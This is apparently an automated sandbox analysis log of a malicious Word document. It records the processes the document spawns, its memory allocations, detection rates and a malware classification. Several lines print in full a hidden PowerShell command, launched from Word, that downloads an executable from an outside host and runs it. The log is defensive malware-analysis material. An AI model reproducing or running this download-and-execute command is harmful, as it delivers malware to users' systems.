                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and write
                    Source: 478644.docVirustotal: Detection: 41%
                    Source: 478644.docReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Roaming\okcff.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................eGk......p...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................bGk......................W.............}..v....H.......0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v....X.......0.................p.....$.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................eGk......p...............W.............}..v....X.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................eGk......p...............W.............}..v....X.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................p.....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................eGk......p...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................bGk......................W.............}..v............0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.... .......0.................p.....&.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................bGk......................W.............}..v....X.......0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................eGk......................W.............}..v.... !......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk.....!................W.............}..v....X"......0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................p.....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk....P'................W.............}..v.....'......0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........eGk......p...............W.............}..v....`+......0.................p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................bGk.....,................W.............}..v.....,......0...............(.p.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............}.jk......................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...P.......0...............H!].....6.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............}.jk......................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............H!].....".......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............}.jk....P.................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................jk.....$]...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............}.jk....P.................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................jk.....$]...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............}.jk....P.................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0...............H!].....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............}.jk......................W.............}..v....H.......0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................jk.....$]...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............}.jk......................W.............}..v....@.......0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w.................jk.....$]...............W.............}..v....x.......0.......................f.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............}.jk....0.................W.............}..v............0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........jk.....$]...............W.............}..v....@.......0...............H!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................}.jk......................W.............}..v....x.......0................!].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....................mljk.... .]...............W.............}..v....pF......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....(G................W.............}..v.....G......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v....8N......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....N................W.............}..v....pO......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v.....S......0.................].....$.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8T................W.............}..v.....T......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....[......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8\................W.............}..v.....\......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....c......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....8d................W.............}..v.....d......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................].....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....i................W.............}..v....0j......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v.....p......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....q................W.............}..v....0r......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....Hv......0.................].....&.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk.....w................W.............}..v.....w......0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................mljk.... .]...............W.............}..v....H~......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk......................W.............}..v............0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................].....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....x.................W.............}..v............0...............x.].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......mljk.... .]...............W.............}..v............0.................].............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................ljk....@.................W.............}..v............0...............x.].............................Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....p...............................................................................Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.............,.......T.......Y.......................e. .......................................Zs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............,.......T...............................e. .......................................Zs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............,.......T...............................e. .............................H.........Zs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................... .............W.a.i.t.i.n.g. .f.o.r. .2.....0.......h.......................0...............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................0...............................e. .......................................Qs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................0...............................e. .......................................Qs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................0.......2.......................e. .............................8.........Qs....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................`. ...........W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................&....................... .....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P..... .......................b.......................e. ...............&.......................ms....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..... .......................L.......................e. ...............&.......................ms....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..... ...............................................e. ...............&.......................ms....Jump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ......................#...........W.a.i.t.i.n.g. .f.o.r. .2.....8...............................................8.).......................#.....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.).....J.................#.....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.............X.......8...............................e. .............8.).......................bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............X.......................................e. .............8.).......................bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............X.......8...............................e. .............8.).............X.........bs....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................(.............W.a.i.t.i.n.g. .f.o.r. .2.....x...............................0...............................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................x.......O.......................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................x.......K.......................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................x...............................e. .......................................Es....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................'.............................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............'.....J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....T.......................;.......................e. ...............'.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.............(.........ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ...................... ...........W.a.i.t.i.n.g. .f.o.r. .2.....p...............................0.................&....................... .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................p...............................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................p...............................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....................p.......q.......................e. ...............&.......................ms....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................\.............W.a.i.t.i.n.g. .f.o.r. .2.............T.......................................................................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.............B.......................0...............(.&.............................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.&.....J.......................
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................1.e.c.(.P.....................................................e. .............(.&.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.......................ls....
                    Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.............h.........ls....
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\System32\verclsid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$478644.docJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@53/21@4/1
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
